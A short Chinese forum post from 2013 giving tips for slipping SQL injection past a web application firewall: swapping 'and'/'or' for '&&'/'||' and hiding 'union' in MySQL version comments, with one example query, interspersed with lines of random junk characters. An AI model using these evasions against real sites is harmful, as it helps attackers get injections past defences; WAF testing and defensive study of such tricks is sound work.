1.and 用&& 代替
! ~6 q+ W! Z( A$ [: {/ e$ m5 N% q( _ i; K$ |' L: P
2. or 用||代替
* L" o7 ^. t' X/ g0 }- w2 G" S4 a y R2 z7 C7 X
3.union select from 变成 /*!union*/这种。
$ M& b; ?/ K5 C
* q; `. _- F( O" U一个例子:$ ~0 P U& T$ `1 j1 O% c% t0 e
) K3 }( X3 V( _2 S/ select 1 /*!union*/ select 2 from adad where 1&&1
# S! X+ B8 p' a% J- \- ?8 o
3 b/ [/ v9 f# j# h2 S. D摘自 it_security
- j7 W9 x9 O7 \' n: A5 Q
H6 J/ \4 K5 Y7 E! q2 d+ }绕过waf的一个思路
8 z1 Z8 U- I/ e
, ?/ q: b+ g% }/ S" n& C |
发表于 2013-2-23 12:41:12
收藏
支持
反对